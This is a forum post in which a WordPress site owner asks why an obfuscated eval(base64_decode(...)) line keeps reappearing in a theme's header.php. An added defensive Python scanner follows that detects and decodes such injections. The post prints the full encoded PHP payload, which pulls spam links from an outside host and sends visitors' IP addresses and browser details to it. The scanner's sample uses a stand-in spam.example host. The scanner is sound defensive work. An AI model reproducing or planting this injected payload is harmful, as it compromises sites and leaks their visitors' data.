My WP 2.7 site gets Hacked
Hi,
I noticed that my WP site got hacked and that if I read the source code a huge number of viagra links started appearing. The browser renders the site normally and only if you view the generated source, you can see the links.
I discovered that the problem lies with the header.php file of my theme. The following line got appended at the end of the file:
<?php eval(base64_decode(‘CmZ1bmN0aW9uIGc4NzQ2MjgzNDcyMzQoJHUsICRwID0gYXJyYXkgKCkpIHsKICAgICRjID0gY3VybF9pbml0KCk7CiAgICBjdXJsX3NldG9wdCgkYywgQ1VSTE9QVF9VUkwsICR1KTsKICAgIGN1cmxfc2V0b3B0KCRjLCBDVVJMT1BUX1JFVFVSTlRSQU5TRkVSLCAxKTsKICAgIGN1cmxfc2V0b3B0KCRjLCBDVVJMT1BUX1RJTUVPVVQsIDMwKTsKICAgICRoID0gY3VybF9leGVjKCRjKTsKICAgIGN1cmxfY2xvc2UgKCRjKTsKICAgIHJldHVybiAkaDsKfQoKaWYgKHN1YnN0cigkX1NFUlZFUlsnUkVRVUVTVF9VUkknXSwgMCwgOSkgPT0gJy9wYWdlLnBocCcpIHsKICAgIG9iX2VuZF9jbGVhbigpOwoKICAgIGVjaG8gZzg3NDYyODM0NzIzNCgiaHR0cDovL3d3dy5teXdlYi1zdGF0aXN0aWNzLmNuL2dldC5waHA/aT0iIC4gdXJsZW5jb2RlKCRfU0VSVkVSWydSRU1PVEVfQUREUiddKSAuICImaD0iIC4gcmF3dXJsZGVjb2RlKCRfU0VSVkVSWydIVFRQX0hPU1QnXSkgLiAiJmE9MSZpZD0iIC4gdXJsZW5jb2RlKHN1YnN0cigkX1NFUlZFUlsnUkVRVUVTVF9VUkknXSwgMTMpKSAuICImbT0iIC4gdXJsZW5jb2RlKCRfU0VSVkVSWydIVFRQX0hPU1QnXSkgLiAiJmw9IgogICAgICAgIC4gdXJsZW5jb2RlKCRfU0VSVkVSWydIVFRQX0FDQ0VQVF9MQU5HVUFHRSddKSAuICImdT0iIC4gdXJsZW5jb2RlKCRfU0VSVkVSWydIVFRQX1VTRVJfQUdFTlQnXSkgLiAiJnI9IiAuIHVybGVuY29kZSgkX1NFUlZFUlsnSFRUUF9SRUZFUkVSJ10pKTsKCiAgICBleGl0Owp9IGVsc2UgewogICAgZWNobyBnODc0NjI4MzQ3MjM0KCJodHRwOi8vd3d3Lm15d2ViLXN0YXRpc3RpY3MuY24vZ2V0LnBocD9pPSIgLiB1cmxlbmNvZGUoJF9TRVJWRVJbJ1JFTU9URV9BRERSJ10pIC4gIiZsPSIgLiB1cmxlbmNvZGUoJF9TRVJWRVJbJ0hUVFBfQUNDRVBUX0xBTkdVQUdFJ10pIC4gIiZoPSIgLiByYXd1cmxkZWNvZGUoJF9TRVJWRVJbJ0hUVFBfSE9TVCddKSAuICImbT0iIC4gdXJsZW5jb2RlKCRfU0VSVkVSWydIVFRQX0hPU1QnXSkgLiAiJnU9IgogICAgICAgIC4gdXJsZW5jb2RlKCRfU0VSVkVSWydIVFRQX1VTRVJfQUdFTlQnXSkgLiAiJnI9IiAuIHVybGVuY29kZSgkX1NFUlZFUlsnSFRUUF9SRUZFUkVSJ10pKTsKfQ==’)); ?>
I deleted the offending line and everything was fine. After 2 days the offending line “appeared” again. The file rights are 644. Does anyone know how this thing gets generated??
Thanks in advance
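Because the line in the post came back two days after it was deleted, a repeatable check of the theme files is useful. The following is an added example, not part of the original post: a scanner that finds `eval(base64_decode(...))` calls in PHP files and decodes the blob for reading without executing it. The function names and the sample header are constructed for illustration.

```python
import base64
import re
from pathlib import Path

QUOTE = "['\"\u2018\u2019\u201c\u201d]"  # straight or typographic quotes
# eval(base64_decode('<blob>')) as appended to header.php in the post
INJECTION_RE = re.compile(
    r"eval\s*\(\s*base64_decode\s*\(\s*" + QUOTE +
    r"([A-Za-z0-9+/=\s]+)" + QUOTE + r"\s*\)\s*\)", re.IGNORECASE)
URL_RE = re.compile(r"https?://[^\s'\"<>]+")

def find_injections(php_source):
    """Return (line_number, decoded_text_or_None, urls) for each match.
    The blob is decoded for reading only; nothing is ever executed."""
    findings = []
    for m in INJECTION_RE.finditer(php_source):
        blob = re.sub(r"\s+", "", m.group(1))
        try:
            decoded = base64.b64decode(blob, validate=True).decode("utf-8", "replace")
        except ValueError:  # malformed base64 is still reported, undecoded
            decoded = None
        line_no = php_source.count("\n", 0, m.start()) + 1
        findings.append((line_no, decoded, URL_RE.findall(decoded or "")))
    return findings

def scan_tree(root):
    """Scan every .php file under root; return {path: findings} for hits."""
    hits = {}
    for path in sorted(Path(root).rglob("*.php")):
        text = path.read_text(encoding="utf-8", errors="replace")
        found = find_injections(text)
        if found:
            hits[str(path)] = found
    return hits

# Constructed sample: a harmless stand-in payload on a reserved example domain.
SAMPLE_PAYLOAD = b'echo fetch("http://spam.example/get.php?h=" . $host);'
SAMPLE_HEADER = (
    "<html>\n<head><?php wp_head(); ?></head>\n"
    "<?php eval(base64_decode('" + base64.b64encode(SAMPLE_PAYLOAD).decode() + "')); ?>\n")

if __name__ == "__main__":
    for line_no, decoded, urls in find_injections(SAMPLE_HEADER):
        print(f"line {line_no}: calls out to {urls}\n{decoded}")
```

Running `scan_tree` over the whole WordPress directory on a schedule, not only over the theme, shows whether other PHP files carry the same pattern and how soon after cleanup it returns.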